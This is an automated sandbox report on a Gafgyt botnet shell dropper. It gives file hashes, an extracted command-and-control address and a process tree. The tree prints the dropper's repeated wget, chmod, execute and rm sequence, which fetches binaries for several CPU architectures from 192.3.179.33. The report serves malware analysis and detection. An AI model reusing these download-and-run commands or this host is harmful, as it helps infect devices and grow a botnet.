Analysis
max time kernel: 27s
max time network: 24s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
submitted: 04-12-2024 02:17
Static task: static1
Behavioral task behavioral1
  Sample: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task behavioral2
  Sample: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
  Resource: debian9-armhf-20240611-en
Behavioral task behavioral3
  Sample: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task behavioral4
  Sample: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
  Resource: debian9-mipsel-20240226-en
General
Target: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
Size: 2KB
MD5: 8ea1e7d08dd0cf52bbdddc3222e9b8af
SHA1: f031a227d961d83fc0083c4b5b7b4ccdfe64e711
SHA256: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469
SHA512: 1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da
Malware Config
Extracted
gafgyt
192.3.179.33:23
Signatures
Detected Gafgyt variant (1 IoCs)
  resource: behavioral4/files/fstream-1.dat  yara_rule: family_gafgyt
Gafgyt family
File and Directory Permissions Modification (1 TTPs, 13 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  778  chmod
  786  chmod
  752  chmod
  716  chmod
  726  chmod
  731  chmod
  735  chmod
  740  chmod
  744  chmod
  748  chmod
  705  chmod
  767  chmod
  758  chmod
Executes dropped EXE (1 IoCs)
  ioc: /tmp/a-r.m-6.SNOOPY  pid: 736  Process: a-r.m-6.SNOOPY
Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description: File opened for modification  ioc: /tmp/a-r.m-6.SNOOPY  Process: wget
Processes
(each entry: executable path, command line, PID; child processes indented under the parent; signature hits in square brackets)

/tmp/2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh  cmd: /tmp/2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh  PID:690
  /usr/bin/wget  cmd: wget http://192.3.179.33/m-i.p-s.SNOOPY  PID:693
  /bin/chmod  cmd: chmod +x m-i.p-s.SNOOPY  PID:705  [File and Directory Permissions Modification]
  /tmp/m-i.p-s.SNOOPY  cmd: ./m-i.p-s.SNOOPY  PID:707
  /bin/rm  cmd: rm -rf m-i.p-s.SNOOPY  PID:708
  /usr/bin/wget  cmd: wget http://192.3.179.33/m-p.s-l.SNOOPY  PID:711
  /bin/chmod  cmd: chmod +x m-p.s-l.SNOOPY  PID:716  [File and Directory Permissions Modification]
  /tmp/m-p.s-l.SNOOPY  cmd: ./m-p.s-l.SNOOPY  PID:718
  /bin/rm  cmd: rm -rf m-p.s-l.SNOOPY  PID:719
  /usr/bin/wget  cmd: wget http://192.3.179.33/s-h.4-.SNOOPY  PID:721
  /bin/chmod  cmd: chmod +x s-h.4-.SNOOPY  PID:726  [File and Directory Permissions Modification]
  /tmp/s-h.4-.SNOOPY  cmd: ./s-h.4-.SNOOPY  PID:727
  /bin/rm  cmd: rm -rf s-h.4-.SNOOPY  PID:728
  /usr/bin/wget  cmd: wget http://192.3.179.33/x-8.6-.SNOOPY  PID:729
  /bin/chmod  cmd: chmod +x x-8.6-.SNOOPY  PID:731  [File and Directory Permissions Modification]
  /tmp/x-8.6-.SNOOPY  cmd: ./x-8.6-.SNOOPY  PID:732
  /bin/rm  cmd: rm -rf x-8.6-.SNOOPY  PID:733
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-6.SNOOPY  PID:734  [Writes file to tmp directory]
  /bin/chmod  cmd: chmod +x a-r.m-6.SNOOPY  PID:735  [File and Directory Permissions Modification]
  /tmp/a-r.m-6.SNOOPY  cmd: ./a-r.m-6.SNOOPY  PID:736  [Executes dropped EXE]
  /bin/rm  cmd: rm -rf a-r.m-6.SNOOPY  PID:738
  /usr/bin/wget  cmd: wget http://192.3.179.33/x-3.2-.SNOOPY  PID:739
  /bin/chmod  cmd: chmod +x x-3.2-.SNOOPY  PID:740  [File and Directory Permissions Modification]
  /tmp/x-3.2-.SNOOPY  cmd: ./x-3.2-.SNOOPY  PID:741
  /bin/rm  cmd: rm -rf x-3.2-.SNOOPY  PID:742
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-7.SNOOPY  PID:743
  /bin/chmod  cmd: chmod +x a-r.m-7.SNOOPY  PID:744  [File and Directory Permissions Modification]
  /tmp/a-r.m-7.SNOOPY  cmd: ./a-r.m-7.SNOOPY  PID:745
  /bin/rm  cmd: rm -rf a-r.m-7.SNOOPY  PID:746
  /usr/bin/wget  cmd: wget http://192.3.179.33/p-p.c-.SNOOPY  PID:747
  /bin/chmod  cmd: chmod +x p-p.c-.SNOOPY  PID:748  [File and Directory Permissions Modification]
  /tmp/p-p.c-.SNOOPY  cmd: ./p-p.c-.SNOOPY  PID:749
  /bin/rm  cmd: rm -rf p-p.c-.SNOOPY  PID:750
  /usr/bin/wget  cmd: wget http://192.3.179.33/i-5.8-6.SNOOPY  PID:751
  /bin/chmod  cmd: chmod +x i-5.8-6.SNOOPY  PID:752  [File and Directory Permissions Modification]
  /tmp/i-5.8-6.SNOOPY  cmd: ./i-5.8-6.SNOOPY  PID:753
  /bin/rm  cmd: rm -rf i-5.8-6.SNOOPY  PID:754
  /usr/bin/wget  cmd: wget http://192.3.179.33/m-6.8-k.SNOOPY  PID:755
  /bin/chmod  cmd: chmod +x m-6.8-k.SNOOPY  PID:758  [File and Directory Permissions Modification]
  /tmp/m-6.8-k.SNOOPY  cmd: ./m-6.8-k.SNOOPY  PID:759
  /bin/rm  cmd: rm -rf m-6.8-k.SNOOPY  PID:761
  /usr/bin/wget  cmd: wget http://192.3.179.33/p-p.c-.SNOOPY  PID:762
  /bin/chmod  cmd: chmod +x p-p.c-.SNOOPY  PID:767  [File and Directory Permissions Modification]
  /tmp/p-p.c-.SNOOPY  cmd: ./p-p.c-.SNOOPY  PID:769
  /bin/rm  cmd: rm -rf p-p.c-.SNOOPY  PID:771
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-4.SNOOPY  PID:772
  /bin/chmod  cmd: chmod +x a-r.m-4.SNOOPY  PID:778  [File and Directory Permissions Modification]
  /tmp/a-r.m-4.SNOOPY  cmd: ./a-r.m-4.SNOOPY  PID:779
  /bin/rm  cmd: rm -rf a-r.m-4.SNOOPY  PID:781
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-5.SNOOPY  PID:782
  /bin/chmod  cmd: chmod +x a-r.m-5.SNOOPY  PID:786  [File and Directory Permissions Modification]
  /tmp/a-r.m-5.SNOOPY  cmd: ./a-r.m-5.SNOOPY  PID:789
  /bin/rm  cmd: rm -rf a-r.m-5.SNOOPY  PID:790
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 108KB
MD5: d99e614a76b1b6b63030556a22cf2881
SHA1: 1cc0cc981f07d648722bc0b112da2d697858558f
SHA256: 6bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5
SHA512: 19585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f